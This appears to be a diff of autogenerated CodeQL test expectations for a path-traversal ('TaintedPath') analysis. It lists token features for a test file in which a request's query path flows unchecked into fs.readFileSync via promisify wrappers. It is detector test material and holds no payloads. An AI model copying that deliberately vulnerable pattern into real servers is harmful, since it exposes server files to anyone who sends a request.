autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:16 | url | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:16 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:16 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:22 | url.parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:22 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:22 | url.parse | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:22 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:22 | url.parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | exceptional return of url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | exceptional return of url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | url.par ... , true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:37 | url.par ... , true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:43 | url.par ... ).query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:43 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:43 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:43 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:43 | url.par ... ).query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:14:38:48 | url.par ... ry.path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:18:38:22 | parse | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:18:38:22 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:18:38:22 | parse | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:18:38:22 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:18:38:22 | parse | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:26 | req | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:26 | req | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:26 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:26 | req | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:30 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:30 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:30 | req.url | calleeImports | url | @@ -9959,6 +80847,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:30 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:30 | req.url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:38:24:38:30 | req.url | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:38:28:38:30 | url | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:28:38:30 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:28:38:30 | url | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:28:38:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:28:38:30 | url | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:38:33:38:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/other-fs-libraries.js:38:33:38:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/other-fs-libraries.js:38:33:38:36 | true | calleeImports | url | @@ -9968,6 +80861,56 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:38:33:38:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:38:33:38:36 | true | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:38:33:38:36 | true | receiverName | url | +| autogenerated/TaintedPath/other-fs-libraries.js:38:39:38:43 | query | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:39:38:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:39:38:43 | query | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:39:38:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:39:38:43 | query | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:38:45:38:48 | path | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:45:38:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:38:45:38:48 | path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:38:45:38:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:38:45:38:48 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:6 | util | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:6 | util | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:6 | util | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:6 | util | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:6 | util | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:16 | util.promisify | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:16 | util.promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:16 | util.promisify | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:16 | util.promisify | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:16 | util.promisify | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | exceptional return of util.pr ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | exceptional return of util.pr ... leSync) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | exceptional return of util.pr ... leSync) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | exceptional return of util.pr ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | exceptional return of util.pr ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | util.pr ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | util.pr ... leSync) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | util.pr ... leSync) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | util.pr ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:33 | util.pr ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | exceptional return of util.pr ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | exceptional return of util.pr ... )(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | exceptional return of util.pr ... )(path) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | exceptional return of util.pr ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | exceptional return of util.pr ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | util.pr ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | util.pr ... )(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | util.pr ... )(path) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | util.pr ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:3:40:39 | util.pr ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:8:40:16 | promisify | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:8:40:16 | promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:8:40:16 | promisify | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:8:40:16 | promisify | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:8:40:16 | promisify | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:19 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:19 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:19 | fs | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:19 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:19 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:32 | fs.readFileSync | CalleeFlexibleAccessPath | util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:32 | fs.readFileSync | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:32 | fs.readFileSync | calleeImports | util | @@ -9977,6 +80920,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:32 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:32 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:40:18:40:32 | fs.readFileSync | receiverName | util | +| autogenerated/TaintedPath/other-fs-libraries.js:40:21:40:32 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:21:40:32 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:40:21:40:32 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:40:21:40:32 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:40:21:40:32 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:40:35:40:38 | path | CalleeFlexibleAccessPath | util.promisify() | | autogenerated/TaintedPath/other-fs-libraries.js:40:35:40:38 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:40:35:40:38 | path | calleeImports | util | @@ -9985,6 +80933,46 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:40:35:40:38 | path | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:40:35:40:38 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:40:35:40:38 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:9 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:9 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:9 | require | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:9 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:9 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | exceptional return of require("bluebird") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | exceptional return of require("bluebird") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | exceptional return of require("bluebird") | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | exceptional return of require("bluebird") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | exceptional return of require("bluebird") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | require("bluebird") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | require("bluebird") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | require("bluebird") | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | require("bluebird") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:21 | require("bluebird") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:31 | require ... omisify | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:31 | require ... omisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:31 | require ... omisify | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:31 | require ... omisify | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:31 | require ... omisify | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | exceptional return of require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | exceptional return of require ... leSync) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | exceptional return of require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | exceptional return of require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | exceptional return of require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | require ... leSync) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | require ... leSync) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | require ... leSync) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | require ... leSync) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:48 | require ... leSync) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | exceptional return of require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | exceptional return of require ... )(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | exceptional return of require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | exceptional return of require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | exceptional return of require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | require ... )(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | require ... )(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | require ... )(path) | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | require ... )(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:3:41:54 | require ... )(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:41:11:41:20 | "bluebird" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:41:11:41:20 | "bluebird" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:41:11:41:20 | "bluebird" | calleeImports | | @@ -9993,6 +80981,16 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:41:11:41:20 | "bluebird" | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:41:11:41:20 | "bluebird" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:41:11:41:20 | "bluebird" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:23:41:31 | promisify | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:23:41:31 | promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:23:41:31 | promisify | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:23:41:31 | promisify | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:23:41:31 | promisify | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:34 | fs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:34 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:34 | fs | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:34 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:34 | fs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:47 | fs.readFileSync | CalleeFlexibleAccessPath | import(!).promisify | | autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:47 | fs.readFileSync | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:47 | fs.readFileSync | calleeImports | bluebird | @@ -10001,6 +80999,11 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:47 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path util promisify fs readFileSync path require bluebird promisify fs readFileSync path require bluebird promisifyAll fs readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:47 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:41:33:41:47 | fs.readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:41:36:41:47 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:41:36:41:47 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| 